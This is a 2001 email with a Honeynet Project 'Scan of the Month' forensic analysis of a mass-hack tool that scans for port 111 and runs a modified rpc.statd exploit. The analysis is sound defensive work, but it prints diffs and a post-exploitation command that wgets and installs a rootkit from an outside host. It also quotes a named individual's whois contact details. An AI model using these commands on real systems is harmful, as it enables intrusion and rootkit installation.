From Stephane.Aubert@hsc.fr Fri Mar 23 13:53:10 2001 Date: Wed, 21 Mar 2001 18:55:44 +0000 From: Stephane Aubert To: project@honeynet.org Cc: Denis Ducamp , Lance Spitzner Subject: scan of the month #13 Scan of the Month #13 : March 2001 Stephane Aubert Denis Ducamp The Challenge: -------------- 1.What is the blackhat attempting to do with his command line syntax? Hack a lot of linux boxes. Usually these boxes are rooted and involved in DOS or DDOS attacks using for example : ping -f ircserver -s 65000 or papasmurf. 2.What does the tool accomplish? This set of programs is a mass-hack tool. The goal of this tool is to find open 111/tcp port on remote computers - on a class A, B or C network - and automatically try to exploit a well-known vulnerability in statd on linux. If a remote shell is obtained few commands are launched in order to download (from the internet) and run a program on the nearly rooted host. This program can be anything such as t0rnkit or the rootkit you want. 3.How does the tool work? To run this tool you must run the script luckgo. . luckgo: the first script It takes at least one argument: the class A to scan. With 2 or 3 arguments it will scan a class B or C. Example: "./luckgo 12 20" will scan 12.20/16 (AT&T) It generates binary files for the scanner and the exploit. Then runs the scanner on the remote class and the port 111/tcp. . luckscan-a: the scanner This program is a primitive tcp port scanner. It tries to connect to every port 111/tcp. When such a port is open, it runs the statd exploit (called here luckstatdx) without knowing if statd is present. . luckstatdx: the statd exploit This one tries to exploit a format string bug in rpc.statd on linux (rh 6.x). If it succeeded (and obtained a root shell) it will automatically run the following commands : cd /;uname -a; id wget -nd http://www.becys.org/xzibit.tar.gz tar -zxvf xzibit.tar.gz cd lamerk; ./install cd /; rm -rf lamerk xzibit.tar.gz This web server is no more accessible. 4.Is this tool a worm, or would you classify it as something else? First of all: this tool is a mass-hack tool! It can be or become a worm depending on what you can find in the file xzibit.tar.gz, for example by installing and launching luckgo in background. 5.Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? These tools are not original, no more "clever". Both tools are public. . luckscan-a is known as pscan-a.c and can be found on: http://www.self-evident.com/security/scanners/pscan.c.gz pscan.c : by Volatile pscan-a.c : by natas % diff -U 1 pscan-a.c luckscan-a.c --- pscan-a.c Mon Mar 19 14:57:27 2001 +++ luckscan-a.c Tue Dec 5 02:15:24 2000 @@ -170,5 +170,9 @@ else { - printf("%s\n", + char luck[100]; + sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a)); + printf("Lets try to root the %s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a)); + system(luck); + printf("We continue to h4x0r ...\n"); close(connlist[i].s); . luckstatdx comes from statdx.c published in bugtraq on Aug 2000 by ron1n. To: BUGTRAQ@SECURITYFOCUS.COM Subject: Redhat Linux 6.x remote root exploit From: ron1n - Date: Sat, 5 Aug 2000 03:43:20 EST % diff -U 1 statdx.c luckstatdx.c --- statdx.c Wed Mar 21 14:32:51 2001 +++ luckstatdx.c Wed Mar 21 14:30:00 2001 @@ -161,3 +161,3 @@ - fprintf(stderr, "statdx by ron1n \n"); + fprintf(stderr, "statdx modify by becys \n"); fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app); @@ -186,6 +186,6 @@ fd_set fds; - +// Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; - send(sockd, "cd /; ls -alF; id;\n", 19, 0); - + send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); +// Aici cred ca trebuie un exit. for(;;) @@ -249,3 +249,3 @@ { - printf("OMG! You now have rpc.statd technique!@#$!\n"); + printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n"); runshell(sockd); @@ -497,5 +497,5 @@ clnt_perror(clnt, "clnt_call()"); - printf("A timeout was expected. Attempting connection to shell.."); + printf("Hmm,maibe i can root it. Attempting connection to shell..\n"); sleep(5); connection(addr); - printf("Failed\n"); + printf("Fucking shit,i cant,sorry.\n"); } Bonus Question: --------------- What information can you obtain about who is using or created the tool? We used to find tools like pscan, statdx, amdexa, smurf5, etc. on rooted hosts. Sometimes we can get the IP of other rooted boxes. For information "whois -i becys.org" gives: Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 ... Record updated on 2000-09-11 00:00:00. Record created on 2000-09-11. -- Stephane AUBERT Stephane.Aubert@hsc.fr Herve Schauer Consultants -=- Network Security Consultant http://www.hsc.fr/ Phone : +33 141 409 700 ------------------=[ RFC1855 is good for us ! ]=--------------------